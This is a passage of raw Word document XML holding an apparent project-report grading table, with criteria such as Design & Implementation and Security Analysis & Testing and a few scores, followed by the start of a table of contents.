              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="-110" w:right="-107"/>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Design &amp;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="665CC25F" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43" w:rsidP="00E71C43">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="-110" w:right="-107"/>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Implementation </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="964" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:textDirection w:val="btLr"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F99A064" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43" w:rsidP="00E71C43">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="-110" w:right="-117"/>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 xml:space="preserve">Security Analysis </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13AAC2B2" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43" w:rsidP="00E71C43">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="-110" w:right="-117"/>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Testing </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="964" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:textDirection w:val="btLr"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18FBDA24"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Innovation &amp;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10EC68C1"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Application Relevance</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="587B6723" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43" w:rsidP="00E71C43">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="-111" w:right="-106"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="964" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:textDirection w:val="btLr"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11309E4E" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43" w:rsidP="00E71C43">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="-111" w:right="-106"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F416E0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Documentation &amp;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1135E217" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43" w:rsidP="00E71C43">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="-111" w:right="-106"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F416E0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Presentation </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="667" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B2F5855" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43" w:rsidP="00E71C43">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="-112" w:right="-103"/>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Total</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E71C43" w:rsidRPr="00F416E0" w14:paraId="5A7DE1DC" w14:textId="77777777" w:rsidTr="00F416E0">
        <w:trPr>
          <w:trHeight w:val="478"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2131" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74EA2E5B" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57015510" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="964" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69293854"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="964" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D62CF78"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9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="964" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02BE307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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="964" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5555570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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="964" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45F7E083"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="667" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="516CEAF0" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">
            <w:pPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="256" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F416E0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E71C43" w:rsidRPr="00F416E0" w14:paraId="3467AD3A"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2A4EAB9C" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">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271A4EB9" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">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374ADAE3"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DBBFB79"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3FAB35F6"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2641F283" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">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B0164C1" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">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hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F831FCD" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">
            <w:pPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="256" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F416E0" w:rsidRPr="00F416E0" w14:paraId="2CE76B0C"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5DFCFE77" w14:textId="77777777" w:rsidR="00F416E0" w:rsidRPr="00F416E0" w:rsidRDefault="00F416E0">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4DBB076D" w14:textId="77777777" w:rsidR="00F416E0" w:rsidRPr="00F416E0" w:rsidRDefault="00F416E0">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1B18C587"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205E9939"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6828D6A1"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01BEBDCD"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0D8416C0" w14:textId="77777777" w:rsidR="00F416E0" w:rsidRPr="00F416E0" w:rsidRDefault="00F416E0">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tcPr>
          <w:p w14:paraId="1F697CDA" w14:textId="77777777" w:rsidR="00F416E0" w:rsidRPr="00F416E0" w:rsidRDefault="00F416E0">
            <w:pPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="256" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F416E0" w:rsidRPr="00F416E0" w14:paraId="1B85BB7D" w14:textId="77777777" w:rsidTr="00F416E0">
        <w:trPr>
          <w:trHeight w:val="567"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2131" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="74B23CB0" w14:textId="77777777" w:rsidR="00F416E0" w:rsidRPr="00F416E0" w:rsidRDefault="00F416E0">
            <w:pPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="256" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="74CF16B5" w14:textId="77777777" w:rsidR="00F416E0" w:rsidRPr="00F416E0" w:rsidRDefault="00F416E0">
            <w:pPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="256" w:lineRule="auto"/>
              <w:ind w:left="-76" w:right="-108"/>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7A717D0"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70495C5A"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4968E813"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589BF2A6" w14:textId="77777777" w:rsidR="00F416E0" w:rsidRPr="00F416E0" w:rsidRDefault="00F416E0">
            <w:pPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="256" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="964" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="71B8AAA9" w14:textId="77777777" w:rsidR="00F416E0" w:rsidRPr="00F416E0" w:rsidRDefault="00F416E0">
            <w:pPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="256" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="667" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="547805DC" w14:textId="77777777" w:rsidR="00F416E0" w:rsidRPr="00F416E0" w:rsidRDefault="00F416E0">
            <w:pPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="256" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="086D54ED" w14:textId="77777777" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="006E7149">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="655FCD2E" w14:textId="77777777" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="006E7149">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="274F49AF" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27CA8E99" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20CD5D20" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="017A4A6D" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B85FB1C" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DFF2DE6" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7190B5DB" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="579D8293" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50A73085" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38FD4678" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67852F80" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B7C2D65" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65E66B1C" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53A7EEE8" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C851D09" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CD45E0B" w14:textId="77777777" w:rsidR="00F416E0" w:rsidRDefault="00F416E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="463DC3D9" w14:textId="27E810AC" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="005E06C9" w:rsidP="00F416E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:pos="9014" w:val="right"/>
        </w:tabs>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F416E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Content</w:t>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sidRPr="00F416E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Page No.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8F38E5"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Introduction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
